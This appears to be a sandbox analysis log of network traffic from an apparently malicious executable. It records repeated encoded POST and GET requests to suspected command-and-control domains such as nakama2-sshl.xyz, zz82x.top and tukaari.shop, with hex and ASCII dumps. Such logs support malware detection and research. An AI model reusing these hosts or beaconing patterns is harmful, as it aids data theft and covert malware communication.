                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.449757183.181.83.131802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:28.257477999 CEST10834OUTPOST /ui3j/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.nakama2-sshl.xyz
                          Origin: http://www.nakama2-sshl.xyz
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.nakama2-sshl.xyz/ui3j/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 6e 30 53 7a 6a 54 68 51 56 34 7a 41 72 31 68 55 6b 6e 42 75 2b 43 43 36 66 6c 72 47 6e 56 57 2b 72 39 4d 78 52 4d 4b 32 6c 59 67 75 58 42 31 33 45 54 52 5a 46 61 41 4d 30 55 46 6b 30 55 76 59 4c 6e 52 4a 66 5a 47 7a 52 44 42 78 31 64 30 2b 74 43 57 34 6b 51 45 4e 66 59 56 61 4f 33 5a 6d 44 65 46 79 77 44 53 43 33 42 4c 56 31 58 57 5a 61 2f 38 66 34 32 7a 33 6d 44 50 79 43 35 2f 4a 4e 4f 48 39 45 50 65 69 2b 79 5a 76 76 66 4e 2b 76 68 33 2f 55 7a 75 73 4f 66 78 49 37 74 6b 31 66 53 33 65 7a 68 47 4f 4c 66 73 55 68 51 47 4c 31 44 36 62 2f 49 33 50 4b 32 44 2b 73 30 48 46 2b 43 68 69 65 58 6c 4f 33 72 45 61 59 68 45 73 76 4a 66 76 5a 58 4f 31 51 33 72 56 76 7a 50 41 45 31 6c 2f 4e 34 53 41 6c 4b 30 61 68 68 69 36 6a 30 72 4f 54 51 59 77 4e 6a 70 39 68 64 48 2b 72 44 2f 75 51 6a 47 36 46 57 79 68 2f 4e 6a 38 6f 55 34 4b 30 37 38 52 38 64 31 65 35 6d 2b 66 42 31 [TRUNCATED]
                          Data Ascii: 3jE8o=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2n0SzjThQV4zAr1hUknBu+CC6flrGnVW+r9MxRMK2lYguXB13ETRZFaAM0UFk0UvYLnRJfZGzRDBx1d0+tCW4kQENfYVaO3ZmDeFywDSC3BLV1XWZa/8f42z3mDPyC5/JNOH9EPei+yZvvfN+vh3/UzusOfxI7tk1fS3ezhGOLfsUhQGL1D6b/I3PK2D+s0HF+ChieXlO3rEaYhEsvJfvZXO1Q3rVvzPAE1l/N4SAlK0ahhi6j0rOTQYwNjp9hdH+rD/uQjG6FWyh/Nj8oU4K078R8d1e5m+fB11+B/EUTX1ahHMGTWI9fBCvoW9aSjsW4lPnf0XRrgIqsNGfLKWis5k91guQhu2e8NVJSs7c7OKNgT5NKdDfCbh5bUSpo0u1accyrNORDo6wFGxe9A4jRizHVWOdvO/M/N+wIEikRplCZlaqAl4UV04vGZQMq5BJH5u1QOngriYbwJg1CtVjX1t3LsIXw4GTycPTUjnsfQcmDPTXPd6gyTSdS0P0sBhnkImIyCI7UVTXBxpJOu+QuHaNlWlxs9wFHkjY+tnFoynQ3nOhZGDtOIALZcvYxFtNInj62hUUOFQL9fn5LS9IgB+wSSCx6rtL3B3VU8rFRsgUzua/g7CuWyR1LRWvhFgnuIk+G3Shrq49QQ0vb1J0vhK8Cna2V/pVjRUssfqJOMj649a6MRY4+SnIx3uZPH21bbjh1yWWsos88pPqndV40Apn6GFqGjCDXDsE1RVaUZ5Qo/97Fw42SAXO8PP1oWyEjAfPquXCo3/JZ1Mjft0PZtF+30mKVu5t7oSN17k4k6GZeRaz3crtVCirItqkVx6FXg33et4wrAOAo7z1gnyG1IDvwjr7wc8VZyigfYd/O5EjBNOiF2UU2X+otT1kuvc1JywN7L7ayKsi2IWwHWqaBipu+Qi4/kBJWW8vIpZWqsjZl920WJTmWs4fAd1LVAZMQmhu [TRUNCATED]
                          Sep 23, 2024 14:55:29.303375006 CEST1236INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                          Content-Encoding: gzip
                          Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                          Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                          Sep 23, 2024 14:55:29.303478956 CEST224INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                          Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15
                          Sep 23, 2024 14:55:29.303539991 CEST1236INData Raw: 50 a9 57 40 43 bd 08 4a 42 3a a8 b1 5e 54 cb a2 f1 54 a4 70 8d 1e 4a 83 99 c4 c9 f8 63 a8 c4 32 54 ca 2b c5 da 32 fe 4d 92 03 fc d1 7e b4 14 da 3e a1 0d b5 61 e8 04 c6 63 2f 54 aa ab 45 f1 3f 64 be a0 2e af 41 20 b5 a2 ba 56 9f 84 5e 77 1c 8b 70
                          Data Ascii: PW@CJB:^TTpJc2T+2M~>ac/TE?d.A V^wpjnOAo]:J2\tU(B$Uja.R&cVj<dVT2kck:n{'R`K]5Crq2i"h<xRU@C,kk54
                          Sep 23, 2024 14:55:29.303577900 CEST1236INData Raw: 64 7a 76 07 e8 94 19 e0 b3 a3 96 d4 c8 93 87 15 54 b2 8d 87 89 9e 66 7b db a8 2b 8b 15 46 29 0a 1b 99 aa b5 52 50 33 62 ed 6b ba 6e 30 2b 0a 67 46 e4 4d 59 01 35 7e b9 47 c8 b3 34 df 59 29 97 a7 a1 8d 74 ae ad f5 4c 6b 7f e3 51 cc ba a7 7a 01 13
                          Data Ascii: dzvTf{+F)RP3bkn0+gFMY5~G4Y)tLkQz],WW:Hq~4DHvP6I&wM5v2u^Q9W4GsyeFYPJ+g@.Tzb{OwicIADYozB0%>P!,?UI(/U}nk1kz`T
                          Sep 23, 2024 14:55:29.303611994 CEST1236INData Raw: f4 3e 9c 7d 70 f4 b3 e0 e0 83 5b ff 78 fd d6 db 1f 06 07 6f 06 07 ff 74 fb a7 5f dc 3a f8 f4 e6 1b 9f dc 7e ff c6 ed b7 de 69 e0 b6 ca 0e 39 38 86 36 f1 25 14 03 a1 07 5a b9 d9 89 88 4f 50 8f 6b 67 9a 8b 3b 6b 39 c6 a0 18 9d 16 0f 47 20 7e 47 12
                          Data Ascii: >}p[xot_:~i986%ZOPkg;k9G ~G0O'TudA2)7.7inlrIdpplXnZ>ER)ZVr]_ZeRQWUV[^4eu:H?~0D`\C,
                          Sep 23, 2024 14:55:29.303647041 CEST1236INData Raw: c4 b4 c7 b4 fb 03 5f bc bc 81 e2 c3 9c d4 c7 b5 76 a3 eb 58 38 26 6d e4 6e fe ee 57 b7 3e 81 eb 79 2b 38 fc 49 70 f4 e3 e0 10 07 07 e4 c1 5e 44 74 76 fc a3 df 1f bf fc 76 0e 09 3a 5c 1f db c8 e5 90 a0 a3 f7 5d 20 cd c7 08 67 29 43 ac 56 1c 81 30
                          Data Ascii: _vX8&mnW>y+8Ip^Dtvv:\] g)CV0iwqHNe\b3Y\1wiy>{u28fXZi)v0+_c7_~/# KN+P =bSqfsl?a/R<kDLPVp,!d:aLtp
                          Sep 23, 2024 14:55:29.303678989 CEST322INData Raw: 4a 19 c4 40 ff 4b 95 26 a7 46 54 3f ce 44 14 b3 9f c4 25 1a d7 db a1 da c7 13 cd e0 07 0f 3c 15 dd ba e1 d6 80 d7 98 e2 cd 4e 13 2d 41 6b e1 a5 98 cf 2a ec 8f cc ea 3f e9 05 b2 df 8c da 27 8a 6d 52 17 7c a0 fa c4 77 a8 f9 fc 76 cf 58 d9 9c a1 f2
                          Data Ascii: J@K&FT?D%<N-Ak*?'mR|wvX9=DL*{=iZSIKEnHZol-R',wuvOzgvDjXGb.\GQX:5@+qcAAspqci=(;p!\Z.|


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.449758183.181.83.131802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:30.798523903 CEST460OUTGET /ui3j/?3jE8o=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&oB=mVppHlHxM HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.nakama2-sshl.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:55:31.624186039 CEST464INHTTP/1.1 301 Moved Permanently
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 0
                          Connection: close
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          X-Redirect-By: WordPress
                          Location: http://nakama2-sshl.xyz/ui3j/?3jE8o=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&oB=mVppHlHxM


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.44975938.47.232.196802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:36.842179060 CEST711OUTPOST /ak5l/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.zz82x.top
                          Origin: http://www.zz82x.top
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.zz82x.top/ak5l/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 41 36 4d 74 5a 45 75 36 32 57 4a 6e 61 62 6a 4d 6f 31 31 71 77 48 30 2f 57 70 69 35 74 4e 70 4d 35 5a 70 39 31 6e 4d 42 62 70 77 55 6b 77 67 48 77 4f 36 68 38 39 55 4e 56 72 72 74 46 6e 51 42 68 4e 36 74 78 4d 34 51 58 31 6d 4f 79 49 51 38 31 56 49 59 74 52 48 64 6f 42 5a 6f 5a 67 75 4d 43 39 76 46 67 45 50 50 6d 67 74 69 39 41 54 34 78 30 45 35 4f 76 69 79 5a 4f 69 2f 67 2b 39 5a 49 38 37 42 6c 5a 4c 4b 59 32 6c 65 2f 6e 4b 66 46 4f 66 72 6f 51 31 52 77 63 34 49 7a 6d 65 6e 48 6d 6b 30 67 45 4c 54 70 2f 65 74 61 44 55 34 6d 38 45 74 43 41 3d 3d
                          Data Ascii: 3jE8o=TFWyNNewSMoxA6MtZEu62WJnabjMo11qwH0/Wpi5tNpM5Zp91nMBbpwUkwgHwO6h89UNVrrtFnQBhN6txM4QX1mOyIQ81VIYtRHdoBZoZguMC9vFgEPPmgti9AT4x0E5OviyZOi/g+9ZI87BlZLKY2le/nKfFOfroQ1Rwc4IzmenHmk0gELTp/etaDU4m8EtCA==
                          Sep 23, 2024 14:55:37.777416945 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:37 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.44976038.47.232.196802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:39.392600060 CEST731OUTPOST /ak5l/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.zz82x.top
                          Origin: http://www.zz82x.top
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.zz82x.top/ak5l/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 42 61 63 74 57 44 61 36 2b 57 49 56 52 37 6a 4d 68 56 30 74 77 48 34 2f 57 71 75 50 34 75 4e 4d 34 34 5a 39 6e 57 4d 42 65 70 77 55 39 41 67 65 76 2b 36 71 38 39 59 46 56 75 54 74 46 6e 55 42 68 4d 4b 74 78 2f 67 66 55 46 6d 4d 37 6f 52 36 78 56 49 59 74 52 48 64 6f 42 39 43 5a 67 47 4d 43 4d 66 46 79 57 6e 4d 71 41 74 74 34 41 54 34 37 6b 45 39 4f 76 6a 56 5a 4c 44 59 67 38 31 5a 49 38 72 42 6c 4d 33 4a 43 6d 6c 59 7a 33 4b 4c 4d 4f 4f 2b 68 52 45 78 34 75 67 4b 77 46 69 66 47 67 31 75 78 31 71 45 37 2f 36 65 48 45 64 4d 72 2f 35 6b 5a 4a 6c 75 44 57 49 46 56 31 4c 2b 36 2b 51 50 5a 53 4b 42 41 2b 73 3d
                          Data Ascii: 3jE8o=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uNM44Z9nWMBepwU9Agev+6q89YFVuTtFnUBhMKtx/gfUFmM7oR6xVIYtRHdoB9CZgGMCMfFyWnMqAtt4AT47kE9OvjVZLDYg81ZI8rBlM3JCmlYz3KLMOO+hREx4ugKwFifGg1ux1qE7/6eHEdMr/5kZJluDWIFV1L+6+QPZSKBA+s=
                          Sep 23, 2024 14:55:40.297420979 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:40 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.44976138.47.232.196802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:41.941613913 CEST10813OUTPOST /ak5l/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.zz82x.top
                          Origin: http://www.zz82x.top
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.zz82x.top/ak5l/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 42 61 63 74 57 44 61 36 2b 57 49 56 52 37 6a 4d 68 56 30 74 77 48 34 2f 57 71 75 50 34 75 46 4d 34 4b 42 39 32 46 30 42 64 70 77 55 69 77 67 44 76 2b 36 37 38 39 51 2f 56 76 76 54 46 6c 63 42 75 4f 43 74 7a 4f 67 66 44 56 6d 4d 32 49 51 39 31 56 49 4a 74 52 58 5a 6f 42 74 43 5a 67 47 4d 43 50 33 46 78 45 50 4d 73 41 74 69 39 41 53 35 78 30 45 56 4f 76 72 76 5a 4c 50 69 67 74 56 5a 49 64 62 42 6d 2b 66 4a 4a 6d 6c 61 77 33 4c 4d 4d 4f 44 75 68 56 63 44 34 76 55 6b 77 43 4b 66 48 6d 34 59 68 47 50 63 34 4f 61 48 54 45 64 35 69 59 4a 32 61 4a 56 53 4b 44 55 4a 4c 57 76 78 32 63 49 4b 4d 42 53 30 66 34 73 4c 4d 70 63 42 76 33 74 52 48 6d 4c 35 72 6b 54 78 31 4e 48 66 30 44 46 2b 4e 59 34 67 66 49 6b 66 39 77 57 69 42 6d 34 74 57 4d 4a 35 35 37 66 35 32 6a 62 78 42 4c 41 64 71 46 46 62 38 57 2b 61 59 38 52 4d 59 62 6b 52 59 59 67 61 6e 55 76 47 4c 53 74 48 55 72 58 4f 41 66 33 61 74 56 63 69 41 44 4c 64 51 30 69 76 4c 67 6a 43 31 4a 2f 51 2f 71 43 5a [TRUNCATED]
                          Data Ascii: 3jE8o=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uFM4KB92F0BdpwUiwgDv+6789Q/VvvTFlcBuOCtzOgfDVmM2IQ91VIJtRXZoBtCZgGMCP3FxEPMsAti9AS5x0EVOvrvZLPigtVZIdbBm+fJJmlaw3LMMODuhVcD4vUkwCKfHm4YhGPc4OaHTEd5iYJ2aJVSKDUJLWvx2cIKMBS0f4sLMpcBv3tRHmL5rkTx1NHf0DF+NY4gfIkf9wWiBm4tWMJ557f52jbxBLAdqFFb8W+aY8RMYbkRYYganUvGLStHUrXOAf3atVciADLdQ0ivLgjC1J/Q/qCZ8D3NVuK5udUSwVcvC0d3aIMM8RddJhHkifPKz8ENbWM3wfNc3ZBmLZ+J2mHvUn7dXBnZoaw+eTWTWsg9uBGlQMPuxKpWrhZBkbVvqeFbErKfyLuxanBzG6L9T6Ru6WvAw18zF40bTqkCYznpXXF24mttb4jBqgcHV8OHF532YwyEKSqkOPPw6KfcRlw4c03hduaGRQjGzHXknROI9lky1p5Q9n7RIdymieCl2ulu6YprXUEouayP7/TRge8c0Pc4bqt12dQFnTIuT7vQ2fSzDhhZAvdxY1GsQi7Bc7cyq0v17qhs+MKeK/2zuLUa6/kbdfRFKrlDdCwWEXyqMy6CE7/qOgzqOD0/vFpXhDMIhbcPyY6KzTznog4dDvf1QRmGYQoHDwjVhbgI/wyPAJRL2ePGI2UHamadVi1/PmW5oSuPJaacQE+P3puqguASYO95rJ8uM3+aTsKWCPTwoYPnEcoDcJ7mP43ltWv7Ofh1al/DHn3M7HK38lrk/KhF9UAxLy1ydTQrE6ZZevLkmtSAHzgpMukV+lWGXh2E5t9Zrs0v4MJD6Ivx1ZB2/gTPNkZoM2Zm2hAtcLO/iKFqCIu9eC8EWmIQw3LqVgyp9qpZsjPcso3h1Z0YWyEqQC12f4vZO+K8k8IQUon8G0o6+VjhdzsQ9NWNtfNfId [TRUNCATED]
                          Sep 23, 2024 14:55:42.895127058 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:42 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.44976238.47.232.196802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:44.483935118 CEST453OUTGET /ak5l/?3jE8o=eH+SO6exUc8kNdkvUVCoynUPLpD0oidFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhJwia7KRoh2N0l2r+oB94KBnVCOyz53vPt1M=&oB=mVppHlHxM HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.zz82x.top
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:55:45.467659950 CEST289INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Mon, 23 Sep 2024 12:55:45 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.4497633.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:55:50.531589031 CEST720OUTPOST /b8ih/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.tukaari.shop
                          Origin: http://www.tukaari.shop
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.tukaari.shop/b8ih/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 69 77 37 2f 64 63 70 65 66 53 6f 75 33 71 36 32 56 44 65 44 4d 30 4a 31 4b 76 6c 33 64 47 78 71 50 4b 4d 61 61 4c 38 36 6b 2f 51 51 63 34 66 39 6a 4a 75 61 44 6e 46 35 41 78 65 76 67 6c 72 52 76 63 56 51 6e 47 55 2b 6a 66 33 42 4f 36 49 70 58 35 57 57 51 4f 2b 30 2f 67 72 39 39 5a 70 70 6e 4b 4d 41 45 7a 56 4e 67 4f 4e 71 33 4d 37 61 50 4e 74 44 36 59 6e 61 66 31 5a 5a 36 36 4d 49 70 78 45 62 7a 4b 37 45 42 61 73 73 34 51 6d 43 4a 76 6c 63 6f 55 4c 56 48 4d 4e 61 46 51 69 73 4b 71 7a 41 4b 79 44 66 6c 57 42 47 42 45 51 62 64 6c 7a 44 51 3d 3d
